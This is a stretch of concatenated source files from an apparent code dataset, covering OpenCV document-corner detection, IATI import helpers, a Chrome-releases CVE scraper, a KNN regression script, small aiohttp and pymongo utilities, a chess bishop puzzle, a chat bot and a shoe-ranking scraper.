contour\")\r\n #apply the Algorithm 1\r\n #(Algorithm 1) Find possible four corners of document based on hough lines using imgage edges.\r\n _,extLeftTop, extRightTop, extLeftBot, extRightBot = FindFourPointUsingHoughLines(edged)\r\n #convex hull with four edged\r\n elif hull_4vertice == 1:\r\n print(\"case 2: hull 4 edged\")\r\n # compare ratio with convex hull using houglines method (algorithm 1)\r\n check_HL, extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL=FindFourPointUsingHoughLines(edged)\r\n FourextPointfromHL=np.array([extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL]).astype(np.int32) #1.tl 2.tr 3.br 4.bl\r\n # get the smallest one from hull 4 edged\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = hull[-1][0],hull[-1][1],hull[-1][2],hull[-1][3]\r\n # update four corners if possible\r\n #extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n if check_HL == True:\r\n FourextPointfromHULL = np.array([extLeftTop,extRightTop,extRightBot,extLeftBot]).astype(np.int32)\r\n # compare ratio between two areas\r\n ratio2Area = np.abs(cv2.contourArea(FourextPointfromHULL)) / np.abs(cv2.contourArea(FourextPointfromHL))\r\n ratio2Area2 = np.abs(cv2.contourArea(FourextPointfromHL)) / (edged.shape[0]*edged.shape[1])\r\n print(\"S_1 / S_image\" \r\n ,ratio2Area2)\r\n print(\"S_2 / S_1\",ratio2Area)\r\n \r\n # ratio là S_2/S_1 ( thường là S_1>S_2)\r\n # nếu dùng hull mà được diện tích lớn hơn thì phải nhận diện tích đó\r\n if ratio2Area < 1 and ratio2Area2 > 0.5:\r\n #get four corners from hough line method (algorithm 1)\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n\r\n elif len(Group_FourCornerDoc) == 1:\r\n print(\"case 3: only one rect\")\r\n #compare ratio with convex hull using houglines method (algoritm 1)\r\n #Point extLeftTopHL, extRightTopHL, extLeftBotHL, extRightBotHL;\r\n check_HL, extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL=FindFourPointUsingHoughLines(edged)\r\n #1.tl 2.tr 3.br 4.bl\r\n FourextPointfromHL=np.array([extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL]).astype(np.int32) \r\n\r\n #get the largest one from set of rotated rectangles\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = Group_FourCornerDoc[0][0],Group_FourCornerDoc[0][1],Group_FourCornerDoc[0][2],Group_FourCornerDoc[0][3]\r\n if check_HL == True:\r\n FourextPointfromHULL = np.array([extLeftTop,extRightTop,extRightBot,extLeftBot]).astype(np.int32)\r\n # compare ratio between two areas\r\n ratio2Area = np.abs(cv2.contourArea(FourextPointfromHULL)) / np.abs(cv2.contourArea(FourextPointfromHL))\r\n ratio2Area2 = np.abs(cv2.contourArea(FourextPointfromHL)) / (edged.shape[0]*edged.shape[1])\r\n print(\"S_1 / S_image\" \r\n ,ratio2Area2)\r\n print(\"S_2 / S_1\",ratio2Area)\r\n \r\n # ratio là S_2/S_1 ( thường là S_1>S_2)\r\n # nếu dùng hull mà được diện tích lớn hơn thì phải nhận diện tích đó\r\n if ratio2Area < 1 and ratio2Area2 > 0.5:\r\n #get four corners from hough line method (algorithm 1)\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n\r\n\r\n else:\r\n print(\"case 4: multi rects\")\r\n \r\n if(len(Group_FourCornerDoc)== 2):\r\n\r\n extLeftTop, extRightTop, extRightBot, extLeftBot = Group_FourCornerDoc[1][0],Group_FourCornerDoc[1][1],Group_FourCornerDoc[1][2],Group_FourCornerDoc[1][3]\r\n #check inside the contour\r\n \r\n btl = cv2.pointPolygonTest(Group_FourCornerDoc[0], 
(extLeftTop[0],extLeftTop[1]), False);\r\n brt = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extRightTop[0],extRightTop[1]), False);\r\n brb = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extRightBot[0],extRightBot[1]), False);\r\n blb = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extLeftBot[0],extLeftBot[1]), False);\r\n\r\n if (btl > -1 and brt > -1 and brb > -1 and blb > -1):# // inside\r\n #get corners from the largest one;\r\n extLeftTop = Group_FourCornerDoc[0][0];\r\n extRightTop = Group_FourCornerDoc[0][1];\r\n extRightBot = Group_FourCornerDoc[0][2];\r\n extLeftBot = Group_FourCornerDoc[0][3];\r\n\r\n\r\n else:\r\n # multiple RECTs : find intersection points and largest quadrilateral \r\n LeftTop,RightTop,LeftBot,RightBot = [0,0],[edged.shape[1], 0],[0,edged.shape[0]],[edged.shape[1],edged.shape[0]]\r\n for i in range(len(Group_FourCornerDoc)):\r\n \r\n ##get 4 lines for each RECT\r\n extl = Group_FourCornerDoc[i][0];\r\n exrt = Group_FourCornerDoc[i][1];\r\n exrb = Group_FourCornerDoc[i][2];\r\n exlb = Group_FourCornerDoc[i][3];\r\n l1=[None]*4\r\n l2=[None]*4\r\n l3=[None]*4\r\n l4=[None]*4\r\n l1[0] = extl[0]; l1[1] = extl[1]; l1[2] = exrt[0]; l1[3] = exrt[1];\r\n l2[0] = exrt[0]; l2[1] = exrt[1]; l2[2] = exrb[0]; l2[3] = exrb[1];\r\n l3[0] = exrb[0]; l3[1] = exrb[1]; l3[2] = exlb[0]; l3[3] = exlb[1];\r\n l4[0] = exlb[0]; l4[1] = exlb[1]; l4[2] = extl[0]; l4[3] = extl[1];\r\n nlinesP.append(l1);\r\n nlinesP.append(l2);\r\n nlinesP.append(l3);\r\n nlinesP.append(l4);\r\n \r\n if (not nlinesP): ## no line\r\n \r\n border = 10;\r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border;\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border;\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border;\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border;\r\n \r\n else:\r\n \r\n ## find intesection points\r\n \r\n IntersectPoints=FindPointIntersection(edged, nlinesP);\r\n Qual=FindQual(edged, IntersectPoints);\r\n if (Qual):\r\n \r\n ##cout << 'number of quadrilaterals' << Qual.size() << endl;\r\n sort(Qual[0], Qual[0], compareContourAreas);\r\n SelectQual = Qual[0];\r\n extLeftTop = SelectQual[0];\r\n extRightTop = SelectQual[1];\r\n extRightBot = SelectQual[2];\r\n extLeftBot = SelectQual[3];\r\n \r\n else:\r\n \r\n \r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border;\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border;\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border;\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border;\r\n\r\n\r\n \r\n # if functlib._distance(extLeftTop,extRightTop) < functlib._distance(extLeftTop,extLeftBot):\r\n # temp = extLeftTop\r\n # extLeftTop = extRightTop\r\n # extRightTop = extRightBot\r\n # extRightBot = extLeftBot\r\n # extLeftBot = temp\r\n\r\n # print('w1',max(functlib._distance(extLeftTop,extRightTop),functlib._distance(extRightBot,extLeftBot)))\r\n # print('h1',min(functlib._distance(extLeftTop,extLeftBot),functlib._distance(extRightBot,extRightTop)))\r\n\r\n [extLeftTop,extRightTop,extRightBot,extLeftBot] = functlib.posprocess_Qual(edged,[extLeftTop,extRightTop,extRightBot,extLeftBot],border=10,scale = True)\r\n\r\n\r\n #print(\"four point\",[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n #cv2.imshow('Four_Points', img_4point);\r\n #cv2.waitKey(0);\r\n\r\n ###### INTERACTION ##################\r\n #interactive\r\n # if interactive :\r\n # l = 
np.array([extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n # l = l.reshape(4, 2)\r\n # l = functlib.orderPoints(l)\r\n # [extLeftTop,extLeftBot,extRightBot,extRightTop] = interactive_get_contour(l, img_interactive)\r\n #cv2.imshow('aaa',rescaled_image)\r\n #cv2.waitKey(0)\r\n \r\n #[extLeftTop,extLeftBot,extRightBot,extRightTop] = l\r\n\r\n #############################\r\n\r\n\r\n h,w,c = img.shape\r\n h2,w2,c2 = img_original.shape\r\n\r\n \r\n extLeftTop[0] = ceil(extLeftTop[0] * w2/w)\r\n extLeftBot[0] = ceil(extLeftBot[0] * w2/w)\r\n extRightBot[0] = ceil(extRightBot[0] * w2/w)\r\n extRightTop[0] = ceil(extRightTop[0] * w2/w)\r\n\r\n\r\n extLeftTop[1] = ceil(extLeftTop[1] * w2/w)\r\n extLeftBot[1] = ceil(extLeftBot[1] * w2/w)\r\n extRightBot[1] = ceil(extRightBot[1] * w2/w)\r\n extRightTop[1] = ceil(extRightTop[1] * w2/w)\r\n #############################\r\n \r\n img_tf = functlib.four_point_transform(img_original,[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n\r\n # check condition and zoom 4 point again\r\n if check_condition_to_scale(img_tf):\r\n print(\"ZOOM 4 POINT AGAIN \")\r\n extLeftTop,extLeftBot,extRightBot,extRightTop = functlib.zoom_Points([extLeftTop,extLeftBot,extRightBot,extRightTop],0.08)\r\n img_tf = functlib.four_point_transform(img_original,[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n\r\n return img_tf\r\n\r\ndef check_condition_to_scale(img_FFP):\r\n '''find picture of man and check some condition to scale'''\r\n\r\n # resize and convert to Gray\r\n img = functlib.resizeToHeight(img_FFP.copy(),500)\r\n\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n height,width = img.shape\r\n #print(height,width)\r\n #img = cv2.medianBlur(img,5)\r\n img = cv2.GaussianBlur(img, (9, 9), 0)\r\n #img = cv2.bilateralFilter(img,9,75,75)\r\n ret,thresh = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n # cv2.imshow('thresh',thresh)\r\n # cv2.waitKey(0)\r\n\r\n # morphologi_Dilate\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (10,10))\r\n thresh = cv2.morphologyEx(thresh, cv2.MORPH_DILATE, kernel)\r\n #thresh = cv2.dilate(thresh,kernel,iterations = 1)\r\n\r\n # cv2.imshow('thresh',thresh)\r\n # cv2.waitKey(0)\r\n\r\n #find contours\r\n im2, cnts, hierarchy = cv2.findContours(~thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:2] # get largest five contour area\r\n rects = []\r\n roi_copy = img.copy()\r\n\r\n for c in cnts:\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\r\n x, y, w, h = cv2.boundingRect(approx)\r\n # check height of contour\r\n if h >= 0.4*500:\r\n # if height is enough\r\n # create rectangle for bounding\r\n rect = (x, y, x+w, y+h)\r\n rects.append(rect)\r\n cv2.rectangle(roi_copy, (x, y), (x+w, y+h), (0, 255, 0), 3);\r\n # cv2.imshow('thresh',roi_copy)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n\r\n ratio_rm = 9\r\n if(len(rects))==0:\r\n return False\r\n elif len(rects)==1:\r\n #print(width-rects[0][2],ratio_rm*(width/height))\r\n if(width-rects[0][2]1\r\n for r in rects :\r\n x1,y1,x2,y2 = r\r\n if x1 > 0.45*width:\r\n if(width-x2.\n\nfrom ...rsr.models.iati_import_log import IatiImportLog\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import get_model\n\n\ndef add_log(iati_import, field, error, project=None, severity=IatiImportLog.VALUE_NOT_SAVED):\n \"\"\"\n Add a log entry in the IatiImportLog model.\n\n :param iati_import: IatiImport instance\n :param field: String; name of 
the field\n :param error: String; error description\n :param project: Project instance\n :param severity: Integer\n \"\"\"\n get_model('rsr', 'iatiimportlog').objects.create(\n iati_import=iati_import,\n text=u'%s: %s.' % (field, error),\n project=project,\n severity=severity\n )\n\n\ndef get_text(element, version):\n \"\"\"\n Returns the text of an element. Based on the IATI version, this is the direct text of the\n element (v1) or the the text in the underlying 'narrative' element (v2).\n\n :param element: ElementTree node\n :param version: String; the full IATI version, e.g. '1.03' or '2.01'\n :return: String; text of the element or None in case there is no text\n \"\"\"\n if version[0] == '1':\n return element.text or ''\n else:\n narrative_element = element.find('narrative')\n if narrative_element is not None:\n return narrative_element.text or ''\n return ''\n\n\ndef get_or_create_organisation(ref, name):\n \"\"\"\n Looks for an organisation in the RSR database.\n First the ref will be looked up in the Organisation.iati_org_id field. If this does not exist,\n the name will be looked up in the Organisation.name and Organisation.long_name fields.\n If none of these return a match, a new organisation will be created.\n\n :param ref: String; the reference of the organisation that is specified in the IATI file.\n :param name: String; the name of the organisation that is specified in the IATI file.\n :return: Organisation instance or None\n \"\"\"\n if not (ref or name):\n return None\n\n if ref:\n try:\n return get_model('rsr', 'organisation').objects.get(iati_org_id=ref)\n except ObjectDoesNotExist:\n pass\n\n if name:\n try:\n return get_model('rsr', 'organisation').objects.get(name=name[:25])\n except ObjectDoesNotExist:\n try:\n return get_model('rsr', 'organisation').objects.get(long_name=name[:75])\n except ObjectDoesNotExist:\n pass\n\n return get_model('rsr', 'organisation').objects.create(\n name=name[:25],\n long_name=name[:75],\n iati_org_id=ref if ref else None,\n organisation_type='N'\n )\n","sub_path":"akvo/iati/imports/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640014661","text":"# -*- coding: utf-8 -*-\nimport logging\nimport pdb\nimport re\nimport json\nimport scrapy\n\nfrom spiders.common.constantFields import TYPE_URL, TYPE_ITEM\nfrom spiders.common.http_post import send_http\nfrom spiders.spiders.base import BaseSpider\n\n\nclass ChromereleasesSpider(BaseSpider):\n name = 'chromereleases'\n allowed_domains = ['googleblog.com']\n start_urls = ['https://chromereleases.googleblog.com/']\n parsePage = 'getList'\n custom_settings = {\n 'CONCURRENT_REQUESTS': 1,\n 'DOWNLOAD_DELAY': 2,\n }\n\n def getList(self, response):\n logging.info('start getList')\n metaInfo = response.meta.get('metaInfo')\n itemInfoList = []\n self.pageCount += 1 # 统计页数\n\n cveItemInfoList = response.xpath('//div[@id=\"Blog1\"]/div[@itemtype]')\n for i, cveItemSel in enumerate(cveItemInfoList):\n detailUrl = cveItemSel.xpath('./h2/a/@href').extract()[0]\n pubTime = cveItemSel.xpath('.//div[@class=\"published\"]/span/text()').extract()[0].strip()\n if self.pageCount == 1 and i == 0: # 记录当天最新数据\n self.today_latest_item_data = {\n 'url': detailUrl,\n 'pubTime': pubTime\n }\n logging.info('lastest data is %s' % json.dumps(self.today_latest_item_data))\n\n if detailUrl == self.latestDataInfo.get('url') and pubTime == self.latestDataInfo.get(\n 'pubTime'): # 
根据时间和url进行判断是否为新数据\n logging.info('find history data, stop spider')\n self.resInfo['endInfo'] = 'find history data, stop spider'\n break\n\n urlInfo = {\n 'itemType': TYPE_URL,\n 'parsePage': 'getCveItemInfo',\n 'metaInfo': metaInfo,\n 'item': detailUrl,\n }\n itemInfoList.append(urlInfo)\n\n else:\n # next page\n nextPageUrl = response.xpath('//a[@class=\"blog-pager-older-link\"]/@href').extract()[0]\n urlInfo = {\n 'itemType': TYPE_URL,\n 'parsePage': 'getList',\n 'metaInfo': metaInfo,\n 'item': nextPageUrl,\n }\n if self.pageCount < self.maxPageCount: # 防止出错停止不了\n itemInfoList.append(urlInfo)\n else:\n logging.info('stop spider mandatory, spider page count is %d' % self.maxPageCount)\n return itemInfoList\n\n def getCveItemInfo(self, response):\n logging.info('start getCveItemInfo')\n metaInfo = response.meta.get('metaInfo')\n itemInfoList = []\n descriptionStrList = response.xpath('//div[@class=\"post-body\"]//script/text()').extract()\n descStr = ''.join(descriptionStrList)\n contentSel = scrapy.Selector(text=descStr)\n description = ''.join(contentSel.xpath('.//text()').extract()).strip()\n\n item = {}\n item['cveDesc'] = description\n item['cveSource'] = 'GOOGLE'\n item['cveItemTitle'] = response.xpath('//h2[@class=\"title\"]/a/text()').extract()[0].strip()\n item['cveItemUrl'] = response.url\n item['pubTime'] = self.parseTime(response.xpath('//span[@class=\"publishdate\"]/text()').extract()[0].strip())\n urlInfo = {\n 'itemType': TYPE_ITEM,\n 'item': item,\n }\n itemInfoList.append(urlInfo)\n return itemInfoList\n\n def parseTime(self, timeStr):\n monthDict = {'January': '1',\n 'February': '2',\n 'March': '3',\n 'April': '4',\n 'May': '5',\n 'June': '6',\n 'July': '7',\n 'August': '8',\n 'September': '9',\n 'October': '10',\n 'November': '11',\n 'December': '12'\n }\n timeStrList = timeStr.split(',')[1:]\n year = timeStrList[1].strip()\n day = timeStrList[0].strip().split(' ')[1]\n month = monthDict.get(timeStrList[0].strip().split(' ')[0].strip())\n timeStr = '%s-%s-%s' % (year, month, day)\n return timeStr\n\n\n# 运行命令:scrapy crawl chromereleases -a taskType=spider -a taskId=1 -o data.csv\n# 部分抓取:scrapy crawl chromereleases -a taskType=update -a taskId=1 -a sourceUrls=[\\\"https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2020-4698-2/\\\"]\n# 调试:scrapy crawl chromereleases -a taskType=update -a spiderType=test -a taskId=1 -a sourceUrls=[\\\"https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2020-4698-2/\\\"]\n\n'''\n\nhttps://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop.html\n\n\nhttps://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html\n\n'''\n","sub_path":"spiders/spiders/chromereleases.py","file_name":"chromereleases.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341632483","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import BaggingRegressor\nfrom math import sqrt\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n if len(y_true) != 
len(y_pred):\n raise Exception(\"mean_absolute_percentage_error, len is not the same\")\n perc_sum = 0\n for index in range(len(y_true)):\n if y_true[index] != 0:\n perc_sum += (abs(y_true[index] - y_pred[index]) / y_true[index])\n else:\n perc_sum += (abs(y_true[index] - 0.1) / 0.1)\n return perc_sum / (len(y_true))\n\nurl = (\"../data/simulation_1.csv\")\ndata = pd.read_csv(url)\nprint(data.head())\nprint(data[\"latency\"][0])\ndata[\"latency\"].hist(bins=15)\nplt.show()\n\n# remove unused data\ndata.drop(\"content_encripted\", axis=1, inplace=True)\ndata.drop(\"high_security\", axis=1, inplace=True)\ndata.drop(\"destination\", axis=1, inplace=True)\ndata.drop(\"l_1\", axis=1, inplace=True)\ndata.drop(\"l_2\", axis=1, inplace=True)\n\ncorrelation_matrix = data.corr()\nprint(correlation_matrix[\"latency\"])\n\nX = data.drop(\"latency\", axis=1)\nX = X.values\n\ny = data[\"latency\"]\ny = y.values\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=12345\n)\n\n# ----------------- Grid search\nprint(\" -----------------Grid search\")\n\nparameters = {\n \"n_neighbors\": range(1, 50),\n \"weights\": [\"uniform\", \"distance\"],\n}\ngridsearch = GridSearchCV(KNeighborsRegressor(), parameters)\ngridsearch.fit(X_train, y_train)\n\nprint(\"Grid search best params\", gridsearch.best_params_)\ntrain_preds_grid = gridsearch.predict(X_train)\ntrain_mse = mean_squared_error(y_train, train_preds_grid)\ntrain_rmse = sqrt(train_mse)\ntrain_mape = mean_absolute_percentage_error(y_train, train_preds_grid)\nprint(\"Error (rmse) training\", train_rmse)\nprint(\"Error (mape) training\", train_mape)\n\n\ntest_preds_grid = gridsearch.predict(X_test)\ntest_mse = mean_squared_error(y_test, test_preds_grid)\ntest_rmse = sqrt(test_mse)\ntest_mape = mean_absolute_percentage_error(y_test, test_preds_grid)\nprint(\"Error (rmse) testing\", test_rmse)\nprint(\"Error (mape) testing\", test_mape)\n\n# ----------------- bagged_knn\nprint(\"----------------- bagged_knn\")\nbest_k = gridsearch.best_params_[\"n_neighbors\"]\nbest_weights = gridsearch.best_params_[\"weights\"]\nbagged_knn = KNeighborsRegressor(\n n_neighbors=best_k, weights=best_weights\n)\nbagging_model = BaggingRegressor(bagged_knn, n_estimators=100)\nbagging_model.fit(X_train, y_train)\ntrain_preds_grid = bagging_model.predict(X_train)\ntrain_mse = mean_squared_error(y_train, train_preds_grid)\ntrain_rmse = sqrt(train_mse)\ntrain_mape = mean_absolute_percentage_error(y_train, train_preds_grid)\nprint(\"Error (rmse) training\", train_rmse)\nprint(\"Error (mape) training\", train_mape)\n\ntest_preds_bag = bagging_model.predict(X_test)\ntest_mse = mean_squared_error(y_test, test_preds_bag)\ntest_rmse = sqrt(test_mse)\ntest_mape = mean_absolute_percentage_error(y_test, test_preds_bag)\nprint(\"Error (rmse) testing\", test_rmse)\nprint(\"Error (mape) testing\", test_mape)","sub_path":"ReasoningEngine/KNN/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186105320","text":"import pymongo\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.ram\n\n\ndef getSettings(server_id, cog=None):\n s = db['settings'].find_one({'server_id': server_id})\n if cog == None:\n return s\n if s == None:\n return {'enabled': False}\n else:\n return s.get(cog, {'enabled': False})\n\n\ndef updateCogSettings(server_id, cog_name, new_settings):\n db['settings'].update_one({'server_id': server_id}, 
{'$set': {cog_name: new_settings}}, upsert=True)\n\n\ndef updateSettings(server_id, new_settings):\n db['settings'].update_one({'server_id': server_id}, {'$set': new_settings}, upsert=True)\n","sub_path":"db/DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"57967319","text":"import csv\nimport json\n\nfrom aiohttp import web\n\n\ndef to_json(obj):\n return json.dumps(obj, indent=2, sort_keys=True)\n\n\n# test using curl:\n# curl -v http://127.0.0.1/ -X GET -H \"Content-Type: application/json\"\n# curl -v http://127.0.0.1/ -X GET -H \"content-type: text/csv\"\nasync def handle(request):\n\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Common_types\n content_type = request.headers.get('Content-Type', 'text/plain')\n print(f't = {content_type}')\n\n if content_type == 'application/json':\n data = {'some': 'data'}\n # https://docs.aiohttp.org/en/stable/web_quickstart.html#json-response\n return web.json_response(data)\n\n if content_type == 'text/plain':\n # https://docs.aiohttp.org/en/stable/web_reference.html#aiohttp.web.Response\n return web.Response(text='OK')\n\n if content_type == 'text/csv':\n content = \"\"\"Id, Name\n1, user1\n2, user2\n3, user3\n\"\"\"\n headers = {'Content-Type': 'text/csv; charset=UTF-8'}\n return web.Response(\n body=content,\n headers=headers\n )\n\n # https://docs.aiohttp.org/en/stable/web_quickstart.html#exceptions\n raise web.HTTPBadRequest(text=f'unknown content type: {content_type}')\n\n\napp = web.Application()\napp.add_routes([\n web.get('/', handle),\n])\n\nif __name__ == '__main__':\n web.run_app(app, host='127.0.0.1', port=80)\n","sub_path":"aiohttp/server_5_output.py","file_name":"server_5_output.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318744667","text":"#! /usr/bin/python3\n# *-* coding: utf-8 *-*\n\"\"\"31comprehensions-list\n@Author: wikinee\n@License: MIT\n\"\"\"\n\nprint(\"--- list comprehensions ---\")\nmultiples = [i for i in range(30) if i % 3 is 0]\nprint(multiples)\n\nsquared = []\nfor x in range(10):\n squared.append(x**2)\n\n# or\n# squared = [x**2 for x in range(10)]\n\nprint(\"--- dict comprehensions ---\")\n\nmcase = {'a': 10, 'b': 42, 'A': 7, 'Z': 3}\n\n\n# mcase_frequency == {'a': 17, 'z': 3, 'b': 34}\nmcase_frequency = {\n k.lower(): mcase.get(k.lower(), 0) + mcase.get(k.upper(), 0)\n for k in mcase\n}\nprint(mcase_frequency)\n# {v: k for k, v in some_dict.items()}\n\nprint(\"--- set comprehensions ---\")\nsquared = {x**2 for x in [1, 1, 2]}\nprint(squared)\n","sub_path":"Python/interpy/31comprehensions.py","file_name":"31comprehensions.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175991621","text":"#! 
/uspair/bin/env python3\n\ndef find_pairs(bishop_locations, board_size):\n dic = {}\n pairs = 0\n\n for _, v in enumerate(bishop_locations):\n dic[v] = True\n\n for _, v in enumerate(bishop_locations):\n row, col = v\n\n cur_sw = cur_nw = cur_ne = cur_se = (row, col)\n loop = True\n while loop:\n loop = False\n cur_sw = (cur_sw[0] + 1, cur_sw[1] - 1)\n\n cur_nw = (cur_nw[0] - 1, cur_nw[1] - 1)\n\n cur_ne = (cur_ne[0] - 1, cur_nw[1] + 1)\n\n cur_se = (cur_se[0] + 1, cur_se[1]+ 1)\n\n if board_size > cur_sw[0] >= 0 and board_size > cur_sw[1] >= 0:\n loop = True\n if cur_sw in dic:\n pairs += 1\n\n if board_size > cur_nw[0] >= 0 and board_size > cur_nw[1] >= 0:\n loop = True\n if cur_nw in dic:\n pairs += 1\n\n if board_size > cur_ne[0] >= 0 and board_size > cur_ne[1] >= 0:\n loop = True\n if cur_ne in dic:\n pairs += 1\n\n if board_size > cur_se[0] >= 0 and board_size > cur_se[1] >= 0:\n loop = True\n if cur_se in dic:\n pairs += 1\n\n return pairs\n\n\n\nif __name__ == '__main__':\n print(find_pairs([\n (0, 0),\n (1, 2),\n (2, 2),\n (4, 0)\n ], 5))\n print(find_pairs([\n (0, 0),\n (1, 1),\n (0, 3),\n (3, 0),\n (4, 2),\n (4, 4),\n (5, 1)\n ], 6))\n","sub_path":"challenge68/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"218231619","text":"# -*- coding: utf-8 -*-\nfrom yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity\nimport requests\nimport config\n\n\nclass WikiViews(object):\n def __init__(self, interface_layer):\n self.routes = [\n ('^' + config.cmd_prefix + '(?:w|wiki|wikipedia)\\s(?P[^$]+)$', self.wiki)\n ]\n\n def wiki(self, message, match):\n term = match.group('term')\n url = 'https://en.wikipedia.org/w/api.php?' 
\\n            'format=json&' \\\n            'action=query&' \\\n            'prop=extracts|info&' \\\n            'inprop=url&' \\\n            'exintro=&' \\\n            'explaintext=&' \\\n            'redirects=&' \\\n            'exchars=500&' \\\n            'titles=%s' % term\n        r = requests.get(url).json()\n        msg = ''\n\n        for k, v in r.iteritems():\n            if k == 'query':\n                for x, y in v['pages'].iteritems():\n                    title = y['title'].encode('utf-8')\n                    url = y['fullurl'].encode('utf-8')\n                    extract = y['extract'].encode('utf-8')\n                    msg = '{title}\\n{url}\\n\\n{extract}'.format(title=title, url=url, extract=extract)\n\n        return TextMessageProtocolEntity(msg, to=message.getFrom())\n","sub_path":"src/views/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"189874475","text":"import csv\nimport json\nimport os\nimport re\nimport sys\nimport pandas\n\n\nimport requests\n\n\nurl = 'https://runrepeat.com/ranking/rankings-of-running-shoes'\n\nshoe_directory= 'shoes'\nfrontpage_filename = 'shoes_1.html'\ncsv_filename = 'shoes_data.csv'\n\n\ndef pripravi_imenik(ime_datoteke):\n    '''Če še ne obstaja, pripravi prazen imenik za dano datoteko.'''\n    imenik = os.path.dirname(ime_datoteke)\n    if imenik:\n        os.makedirs(imenik, exist_ok=True)\n\n\ndef shrani_spletno_stran(url, ime_datoteke, vsili_prenos=False):\n    '''Vsebino strani na danem naslovu shrani v datoteko z danim imenom.'''\n    try:\n        print('Shranjujem {} ...'.format(url), end='')\n        sys.stdout.flush()\n        if os.path.isfile(ime_datoteke) and not vsili_prenos:\n            print('shranjeno že od prej!')\n            return\n        r = requests.get(url)\n    except requests.exceptions.ConnectionError:\n        print('stran ne obstaja!')\n    else:\n        pripravi_imenik(ime_datoteke)\n        with open(ime_datoteke, 'w', encoding='utf-8') as datoteka:\n            datoteka.write(r.text)\n        print('shranjeno!')\n\n\ndef vsebina_datoteke(ime_datoteke):\n    '''Vrne niz z vsebino datoteke z danim imenom.'''\n    with open(ime_datoteke, encoding='utf-8') as datoteka:\n        return datoteka.read()\n\n\ndef zapisi_csv(slovarji, imena_polj, ime_datoteke):\n    '''Iz seznama slovarjev ustvari CSV datoteko z glavo.'''\n    pripravi_imenik(ime_datoteke)\n    with open(ime_datoteke, 'w', encoding='utf-8') as csv_datoteka:\n        writer = csv.DictWriter(csv_datoteka, fieldnames=imena_polj)\n        writer.writeheader()\n        for slovar in slovarji:\n            writer.writerow(slovar)\n\n\ndef zapisi_json(objekt, ime_datoteke):\n    '''Iz danega objekta ustvari JSON 